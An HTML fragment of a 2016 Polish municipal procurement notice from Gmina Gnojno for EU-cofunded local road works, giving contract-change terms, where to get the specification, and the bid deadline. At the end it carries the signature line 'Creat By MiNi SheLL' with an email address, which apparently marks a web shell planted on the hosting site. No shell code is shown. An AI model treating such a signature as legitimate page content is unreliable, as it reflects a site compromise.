<li>2 - Okres udzielonej gwarancji na wykonanie przedmiotu zamówienia - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Za zgodą Zamawiającego dopuszcza się możliwość wprowadzenia pisemnych zmian
postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy na podst. art. 144 ust. 1 ustawy w przypadku wystąpienia poniższych okoliczności:
zmiana obowiązującej stawki VAT
Zmiana terminu przewidzianego na zakończenie robót, spowodowana następującymi okolicznościami:
zmiany spowodowane warunkami atmosferycznymi w szczególności: warunki atmosferyczne odbiegające od typowych dla pory roku, uniemożliwiające
prowadzenie robót budowlanych
błędy w dokumentacji mające wpływ na realizację robót;
wstrzymanie robót przez Zamawiającego;
konieczność usunięcia błędów lub wprowadzenie zmian w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.gminy.com.pl/gnojno/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Gnojno, Gnojno 145, 28-114 Gnojno - pokój nr 24.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.05.2016 godzina 09:30, miejsce: Urząd Gminy Gnojno, Gnojno 145, 28-114 Gnojno - pokój nr 11 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dofinansowanie w ramach Program Rozwoju Obszarów Wiejskich na lata 2014 - 2020 Budowa lub modernizacja dróg lokalnych  w ramach poddziałania Wspieranie inwestycji związanych z tworzeniem,  ulepszaniem lub rozbudową wszystkich rodzajów małej infrastruktury, w tym inwestycji w energię odnawialną i w oszczędzanie energii.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com